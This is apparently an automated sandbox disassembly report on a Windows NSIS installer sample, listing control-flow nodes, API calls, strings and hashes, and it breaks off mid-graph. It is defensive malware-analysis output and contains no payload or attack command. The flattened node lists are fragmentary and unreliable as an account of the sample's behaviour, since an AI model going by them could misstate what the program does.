MessageBoxIndirectW 4734->4736 4736->4735 4737->4609 4738->4620 4740 405a10 4739->4740 4741 405a04 CloseHandle 4739->4741 4740->4620 4741->4740 4743 405f1a GetTickCount GetTempFileNameW 4742->4743 4744 405f50 4743->4744 4745 4034a3 4743->4745 4744->4743 4744->4745 4745->4555 4746->4637 4747->4639 4748->4643 4749->4661 4750->4653 4752 403dc2 4751->4752 4768 40632f wsprintfW 4752->4768 4754 403e33 4769 403e67 4754->4769 4756 403b63 4756->4678 4757 403e38 4757->4756 4758 40640a 17 API calls 4757->4758 4758->4757 4759->4674 4760->4680 4762 4043ab SendMessageW 4761->4762 4763 405546 4762->4763 4766 401389 2 API calls 4763->4766 4767 40556d 4763->4767 4764 4043ab SendMessageW 4765 40557f OleUninitialize 4764->4765 4765->4709 4766->4763 4767->4764 4768->4754 4770 40640a 17 API calls 4769->4770 4771 403e75 SetWindowTextW 4770->4771 4771->4757 4773 403a51 4772->4773 4774 403a1a 4773->4774 4775 403a56 FreeLibrary GlobalFree 4773->4775 4774->4731 4775->4774 4775->4775 5882 404ba6 5883 404bd2 5882->5883 5884 404bb6 5882->5884 5886 404c05 5883->5886 5887 404bd8 SHGetPathFromIDListW 5883->5887 5893 405a32 GetDlgItemTextW 5884->5893 5889 404bef SendMessageW 5887->5889 5890 404be8 5887->5890 5888 404bc3 SendMessageW 5888->5883 5889->5886 5892 40140b 2 API calls 5890->5892 5892->5889 5893->5888 5908 4029a8 5909 402c1f 17 API calls 5908->5909 5910 4029ae 5909->5910 5911 4029d5 5910->5911 5912 4029ee 5910->5912 5917 40288b 5910->5917 5913 4029da 5911->5913 5914 4029eb 5911->5914 5915 402a08 5912->5915 5916 4029f8 5912->5916 5922 4063e8 lstrcpynW 5913->5922 5914->5917 5923 40632f wsprintfW 5914->5923 5919 40640a 17 API calls 5915->5919 5918 402c1f 17 API calls 5916->5918 5918->5914 5919->5914 5922->5917 5923->5917 5924 739622fd 5925 73962367 5924->5925 5926 73962372 GlobalAlloc 5925->5926 5927 73962391 5925->5927 5926->5925 5935 401a30 5936 402c41 17 API calls 5935->5936 5937 401a39 ExpandEnvironmentStringsW 5936->5937 5938 401a4d 5937->5938 5940 401a60 5937->5940 5939 401a52 lstrcmpW 5938->5939 5938->5940 5939->5940 5052 402032 5053 402044 5052->5053 5054 4020f6 5052->5054 5055 402c41 17 API calls 5053->5055 5056 401423 24 API calls 5054->5056 5057 40204b 5055->5057 5062 402250 5056->5062 5058 402c41 17 API calls 5057->5058 5059 402054 5058->5059 5060 40206a LoadLibraryExW 5059->5060 5061 40205c GetModuleHandleW 5059->5061 5060->5054 5063 40207b 5060->5063 5061->5060 5061->5063 5075 406831 WideCharToMultiByte 5063->5075 5066 4020c5 5070 405450 24 API calls 5066->5070 5067 40208c 5068 402094 5067->5068 5069 4020ab 5067->5069 5071 401423 24 API calls 5068->5071 5078 73961777 5069->5078 5072 40209c 5070->5072 5071->5072 5072->5062 5073 4020e8 FreeLibrary 5072->5073 5073->5062 5076 40685b GetProcAddress 5075->5076 5077 402086 5075->5077 5076->5077 5077->5066 5077->5067 5079 739617aa 5078->5079 5118 73961b5f 5079->5118 5081 739617b1 5082 739618d6 5081->5082 5083 739617c2 5081->5083 5084 739617c9 5081->5084 5082->5072 5168 73962352 5083->5168 5152 73962394 5084->5152 5089 7396180f 5181 73962569 5089->5181 5090 7396182d 5093 73961833 5090->5093 5094 7396187e 5090->5094 5091 739617df 5096 739617e5 5091->5096 5101 739617f0 5091->5101 5092 739617f8 5103 739617ee 5092->5103 5178 73962d37 5092->5178 5195 739615c6 5093->5195 5099 73962569 10 API calls 5094->5099 5096->5103 5162 73962aac 5096->5162 5106 7396186f 5099->5106 5100 73961815 5192 73961272 5100->5192 5172 73962724 5101->5172 5103->5089 5103->5090 5109 739618c5 5106->5109 5201 7396252c 5106->5201 5107 739617f6 5107->5103 5108 73962569 10 API calls 5108->5106 5109->5082 5112 739618cf GlobalFree 5109->5112 5112->5082 5115 739618b1 5115->5109 5205 7396153d wsprintfW 5115->5205 5116 739618aa FreeLibrary 5116->5115 5208 7396121b GlobalAlloc 5118->5208 5120 73961b83 5209 7396121b GlobalAlloc 5120->5209 5122 73961da9 GlobalFree GlobalFree GlobalFree 5123 73961dc6 5122->5123 5136 73961e10 5122->5136 5124 73962192 5123->5124 5132 73961ddb 5123->5132 5123->5136 5126 739621b4 GetModuleHandleW 5124->5126 5124->5136 5125 73961c64 GlobalAlloc 5144 73961b8e 5125->5144 5129 739621c5 LoadLibraryW 5126->5129 5130 739621da 5126->5130 5127 73961caf lstrcpyW 5131 73961cb9 lstrcpyW 5127->5131 5128 73961ccd GlobalFree 5128->5144 5129->5130 5129->5136 5216 7396161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5130->5216 5131->5144 5132->5136 5212 7396122c 5132->5212 5134 739620ec 5134->5136 5147 73962134 lstrcpyW 5134->5147 5135 7396222c 5135->5136 5139 73962239 lstrlenW 5135->5139 5136->5081 5138 73962064 5215 7396121b GlobalAlloc 5138->5215 5217 7396161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5139->5217 5140 739621ec 5140->5135 5150 73962216 GetProcAddress 5140->5150 5143 73962253 5143->5136 5144->5122 5144->5125 5144->5127 5144->5128 5144->5131 5144->5134 5144->5136 5144->5138 5145 73961d0b 5144->5145 5146 73961fa5 GlobalFree 5144->5146 5148 7396122c 2 API calls 5144->5148 5145->5144 5210 7396158f GlobalSize GlobalAlloc 5145->5210 5146->5144 5147->5136 5148->5144 5150->5135 5151 7396206d 5151->5081 5159 739623ac 5152->5159 5153 7396122c GlobalAlloc lstrcpynW 5153->5159 5155 739624d5 GlobalFree 5156 739617cf 5155->5156 5155->5159 5156->5091 5156->5092 5156->5103 5157 73962454 GlobalAlloc WideCharToMultiByte 5157->5155 5158 7396247f GlobalAlloc CLSIDFromString 5158->5155 5159->5153 5159->5155 5159->5157 5159->5158 5161 7396249e 5159->5161 5219 739612ba 5159->5219 5161->5155 5223 739626b8 5161->5223 5163 73962abe 5162->5163 5164 73962b63 EnumWindows 5163->5164 5167 73962b81 5164->5167 5166 73962c4d 5166->5103 5226 73962a56 5167->5226 5169 73962367 5168->5169 5170 73962372 GlobalAlloc 5169->5170 5171 739617c8 5169->5171 5170->5169 5171->5084 5176 73962754 5172->5176 5173 73962802 5175 73962808 GlobalSize 5173->5175 5177 73962812 5173->5177 5174 739627ef GlobalAlloc 5174->5177 5175->5177 5176->5173 5176->5174 5177->5107 5180 73962d42 5178->5180 5179 73962d82 GlobalFree 5180->5179 5230 7396121b GlobalAlloc 5181->5230 5183 7396260e StringFromGUID2 5189 73962573 5183->5189 5184 7396261f lstrcpynW 5184->5189 5185 739625ec MultiByteToWideChar 5185->5189 5186 73962632 wsprintfW 5186->5189 5187 73962656 GlobalFree 5187->5189 5188 7396268b GlobalFree 5188->5100 5189->5183 5189->5184 5189->5185 5189->5186 5189->5187 5189->5188 5190 73961272 2 API calls 5189->5190 5231 739612e1 5189->5231 5190->5189 5193 739612b5 GlobalFree 5192->5193 5194 7396127b GlobalAlloc lstrcpynW 5192->5194 5193->5106 5194->5193 5196 739615d2 wsprintfW 5195->5196 5197 739615ff lstrcpyW 5195->5197 5200 73961618 5196->5200 5197->5200 5200->5108 5202 7396253a 5201->5202 5204 73961891 5201->5204 5203 73962556 GlobalFree 5202->5203 5202->5204 5203->5202 5204->5115 5204->5116 5206 73961272 2 API calls 5205->5206 5207 7396155e 5206->5207 5207->5109 5208->5120 5209->5144 5211 739615ad 5210->5211 5211->5145 5218 7396121b GlobalAlloc 5212->5218 5214 7396123b lstrcpynW 5214->5136 5215->5151 5216->5140 5217->5143 5218->5214 5220 739612c1 5219->5220 5221 7396122c 2 API calls 5220->5221 5222 739612df 5221->5222 5222->5159 5224 739626c6 VirtualAlloc 5223->5224 5225 7396271c 5223->5225 5224->5225 5225->5161 5227 73962a61 5226->5227 5228 73962a66 GetLastError 5227->5228 5229 73962a71 5227->5229 5228->5229 5229->5166 5230->5189 5232 7396130c 5231->5232 5233 739612ea 5231->5233 5232->5189 5233->5232 5234 739612f0 lstrcpyW 5233->5234 5234->5232 5946 402a35 5947 402c1f 17 API calls 5946->5947 5948 402a3b 5947->5948 5949 402a72 5948->5949 5951 40288b 5948->5951 5952 402a4d 5948->5952 5950 40640a 17 API calls 5949->5950 5949->5951 5950->5951 5952->5951 5954 40632f wsprintfW 5952->5954 5954->5951 5955 401735 5956 402c41 17 API calls 5955->5956 5957 40173c SearchPathW 5956->5957 5958 4029e6 5957->5958 5959 401757 5957->5959 5959->5958 5961 4063e8 lstrcpynW 5959->5961 5961->5958 5962 739610e1 5965 73961111 5962->5965 5963 739611d8 GlobalFree 5964 739612ba 2 API calls 5964->5965 5965->5963 5965->5964 5966 739611d3 5965->5966 5967 739611f8 GlobalFree 5965->5967 5968 73961272 2 API calls 5965->5968 5969 73961164 GlobalAlloc 5965->5969 5970 739612e1 lstrcpyW 5965->5970 5971 739611c4 GlobalFree 5965->5971 5966->5963 5967->5965 5968->5971 5969->5965 5970->5965 5971->5965 5972 4014b8 5973 4014be 5972->5973 5974 401389 2 API calls 5973->5974 5975 4014c6 5974->5975 5976 401db9 GetDC 5977 402c1f 17 API calls 5976->5977 5978 401dcb GetDeviceCaps MulDiv ReleaseDC 5977->5978 5979 402c1f 17 API calls 5978->5979 5980 401dfc 5979->5980 5981 40640a 17 API calls 5980->5981 5982 401e39 CreateFontIndirectW 5981->5982 5983 402592 5982->5983 5984 40283b 5985 402843 5984->5985 5986 402847 FindNextFileW 5985->5986 5987 402859 5985->5987 5986->5987 5988 4029e6 5987->5988 5990 4063e8 lstrcpynW 5987->5990 5990->5988 5991 7396166d 5992 73961516 GlobalFree 5991->5992 5994 73961685 5992->5994 5993 739616cb GlobalFree 5994->5993 5995 739616a0 5994->5995 5996 739616b7 VirtualFree 5994->5996 5995->5993 5996->5993

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 8 4034ee 1->8 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 8->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 22 403536 17->22 22->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 31 4035d5-4035d9 28->31 32 4035ce-4035d3 28->32 36 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->36 37 403749-403763 DeleteFileW call 402f30 29->37 34 4035e0-4035e4 31->34 35 4035db-4035df 31->35 32->31 32->32 38 4036a3-4036b0 call 405cea 34->38 39 4035ea-4035f0 34->39 35->34 36->37 54 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 36->54 57 403814-403824 call 4039e6 OleUninitialize 37->57 58 403769-40376f 37->58 55 4036b2-4036b3 38->55 56 4036b4-4036ba 38->56 43 4035f2-4035fa 39->43 44 40360b-403644 39->44 50 403601 43->50 51 4035fc-4035ff 43->51 45 403661-40369b 44->45 46 403646-40364b 44->46 45->38 53 40369d-4036a1 45->53 46->45 52 40364d-403655 46->52 50->44 51->44 51->50 60 403657-40365a 52->60 61 40365c 52->61 53->38 62 4036c2-4036d0 call 4063e8 53->62 54->37 54->57 55->56 56->28 64 4036c0 56->64 73 40394a-403950 57->73 74 40382a-40383a call 405a4e ExitProcess 57->74 65 403804-40380b call 403ad8 58->65 66 403775-403780 call 405cea 58->66 60->45 60->61 61->45 69 4036d5 62->69 64->69 76 403810 65->76 80 403782-4037b7 66->80 81 4037ce-4037d8 66->81 69->29 78 403952-403968 GetCurrentProcess OpenProcessToken 73->78 79 4039ce-4039d6 73->79 76->57 88 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 78->88 89 40399e-4039ac call 4067c2 78->89 83 4039d8 79->83 84 4039dc-4039e0 ExitProcess 79->84 82 4037b9-4037bd 80->82 86 403840-403854 call 4059b9 lstrcatW 81->86 87 4037da-4037e8 call 405dc5 81->87 90 4037c6-4037ca 82->90 91 4037bf-4037c4 82->91 83->84 100 403861-40387b lstrcatW lstrcmpiW 86->100 101 403856-40385c lstrcatW 86->101 87->57 99 4037ea-403800 call 4063e8 * 2 87->99 88->89 102 4039ba-4039c5 ExitWindowsEx 89->102 103 4039ae-4039b8 89->103 90->82 95 4037cc 90->95 91->90 91->95 95->81 99->65 100->57 106 40387d-403880 100->106 101->100 102->79 104 4039c7-4039c9 call 40140b 102->104 103->102 103->104 104->79 109 403882-403887 call 40591f 106->109 110 403889 call 40599c 106->110 115 40388e-40389c SetCurrentDirectoryW 109->115 110->115 118 4038a9-4038d2 call 4063e8 115->118 119 40389e-4038a4 call 4063e8 115->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 128 40393e-403945 call 4061ae 126->128 127->126 129 403907-403927 call 4061ae call 40640a call 4059d1 127->129 128->57 129->126 138 403929-403930 CloseHandle 129->138 138->126
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                • #17.COMCTL32(?,00000006,?,0000000A), ref: 0040353E
                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                • SHGetFileInfoW.SHELL32(004216E8,00000000,?,?,00000000), ref: 00403561
                                                                                                                • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,?,0000000A), ref: 00403576
                                                                                                                • CharNextW.USER32(00000000,00435000,?,00435000,00000000,?,00000006,?,0000000A), ref: 004035AE
                                                                                                                  • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                                                                                  • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 004036E8
                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 004036F9
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403705
                                                                                                                • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403719
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 00403721
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 00403732
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 0040373A
                                                                                                                • DeleteFileW.KERNELBASE(1033,?,00000006,?,0000000A), ref: 0040374E
                                                                                                                  • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                                • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403819
                                                                                                                • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040384D
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 0040385C
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403867
                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,?,0000000A), ref: 00403873
                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 0040388F
                                                                                                                • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?,?,00000006,?,0000000A), ref: 004038E9
                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\czHx16QwGQ.exe,00420EE8,00000001,?,00000006,?,0000000A), ref: 004038FD
                                                                                                                • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,?,0000000A), ref: 0040392A
                                                                                                                • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403959
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\czHx16QwGQ.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                • API String ID: 3441113951-262784313
                                                                                                                • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                                • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                                • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                                • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 159 4051c7-4051cf 152->159 160 405158-40515e 152->160 153->154 154->151 162 405089-40508c 155->162 163 4050fc-4050ff 155->163 156->152 156->155 195 404f33-404f39 157->195 196 404ff8-40500b GetWindowLongW SetWindowLongW 157->196 168 4051d1-4051d7 SendMessageW 159->168 169 4051d9-4051e0 159->169 165 405164-40516e 160->165 166 4053af-4053c1 call 4043c6 160->166 171 405097-4050ac call 404d1a 162->171 172 40508e-405095 162->172 163->152 167 405101-40510b 163->167 165->166 175 405174-405183 SendMessageW 165->175 177 40511b-405125 167->177 178 40510d-405119 SendMessageW 167->178 168->169 179 4051e2-4051e9 169->179 180 405214-40521b 169->180 171->163 194 4050ae-4050bf 171->194 172->163 172->171 175->166 187 405189-40519a SendMessageW 175->187 177->152 189 405127-405131 177->189 178->177 181 4051f2-4051f9 179->181 182 4051eb-4051ec ImageList_Destroy 179->182 185 405371-405378 180->185 186 405221-40522d call 4011ef 180->186 192 405202-40520e 181->192 193 4051fb-4051fc GlobalFree 181->193 182->181 185->166 200 40537a-405381 185->200 211 40523d-405240 186->211 212 40522f-405232 186->212 198 4051a4-4051a6 187->198 199 40519c-4051a2 187->199 190 405142-40514c 189->190 191 405133-405140 189->191 190->152 191->152 192->180 193->192 194->163 201 4050c1-4050c3 194->201 202 404f3c-404f43 195->202 206 405011-405015 196->206 204 4051a7-4051c0 call 401299 SendMessageW 198->204 199->198 199->204 200->166 205 405383-4053ad ShowWindow GetDlgItem ShowWindow 200->205 207 4050c5-4050cc 201->207 208 4050d6 201->208 209 404fd9-404fec 202->209 210 404f49-404f71 202->210 204->159 205->166 214 405017-40502a ShowWindow call 404394 206->214 215 40502f-405037 call 404394 206->215 218 4050d2-4050d4 207->218 219 4050ce-4050d0 207->219 222 4050d9-4050f5 call 40117d 208->222 209->202 226 404ff2-404ff6 209->226 220 404f73-404fa9 SendMessageW 210->220 221 404fab-404fad 210->221 227 405281-4052a5 call 4011ef 211->227 228 405242-40525b call 4012e2 call 401299 211->228 223 405234 212->223 224 405235-405238 call 404d9a 212->224 214->166 215->140 218->222 219->222 220->209 232 404fc0-404fd6 SendMessageW 221->232 233 404faf-404fbe SendMessageW 221->233 222->163 223->224 224->211 226->196 226->206 241 405347-40535b InvalidateRect 227->241 242 4052ab 227->242 246 40526b-40527a SendMessageW 228->246 247 40525d-405263 228->247 232->209 233->209 241->185 244 40535d-40536c call 404ced call 404cd5 241->244 245 4052ae-4052b9 242->245 244->185 248 4052bb-4052ca 245->248 249 40532f-405341 245->249 246->227 251 405265 247->251 252 405266-405269 247->252 254 4052cc-4052d9 248->254 255 4052dd-4052e0 248->255 249->241 249->245 251->252 252->246 252->247 254->255 256 4052e2-4052e5 255->256 257 4052e7-4052f0 255->257 260 4052f5-40532d SendMessageW * 2 256->260 259 4052f2 257->259 257->260 259->260 260->249
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00404DEF
                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00404E39
                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                • SetWindowLongW.USER32(?,?,004053C4), ref: 00404E65
                                                                                                                • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404E79
                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404EBF
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                • GetWindowLongW.USER32(?,?), ref: 00404FFD
                                                                                                                • SetWindowLongW.USER32(?,?,00000000), ref: 0040500B
                                                                                                                • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405193
                                                                                                                • SendMessageW.USER32(?,?,00000000,?), ref: 004051B7
                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                • String ID: $M$N
                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                                • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                                • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                                • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 574 405afa-405b20 call 405dc5 577 405b22-405b34 DeleteFileW 574->577 578 405b39-405b40 574->578 581 405cb6-405cba 577->581 579 405b42-405b44 578->579 580 405b53-405b63 call 4063e8 578->580 582 405c64-405c69 579->582 583 405b4a-405b4d 579->583 587 405b72-405b73 call 405d09 580->587 588 405b65-405b70 lstrcatW 580->588 582->581 586 405c6b-405c6e 582->586 583->580 583->582 589 405c70-405c76 586->589 590 405c78-405c80 call 40672b 586->590 591 405b78-405b7c 587->591 588->591 589->581 590->581 598 405c82-405c96 call 405cbd call 405ab2 590->598 594 405b88-405b8e lstrcatW 591->594 595 405b7e-405b86 591->595 597 405b93-405baf lstrlenW FindFirstFileW 594->597 595->594 595->597 599 405bb5-405bbd 597->599 600 405c59-405c5d 597->600 614 405c98-405c9b 598->614 615 405cae-405cb1 call 405450 598->615 603 405bdd-405bf1 call 4063e8 599->603 604 405bbf-405bc7 599->604 600->582 602 405c5f 600->602 602->582 616 405bf3-405bfb 603->616 617 405c08-405c13 call 405ab2 603->617 608 405bc9-405bd1 604->608 609 405c3c-405c4c FindNextFileW 604->609 608->603 613 405bd3-405bdb 608->613 609->599 612 405c52-405c53 FindClose 609->612 612->600 613->603 613->609 614->589 618 405c9d-405cac call 405450 call 4061ae 614->618 615->581 616->609 619 405bfd-405c06 call 405afa 616->619 627 405c34-405c37 call 405450 617->627 628 405c15-405c18 617->628 618->581 619->609 627->609 631 405c1a-405c2a call 405450 call 4061ae 628->631 632 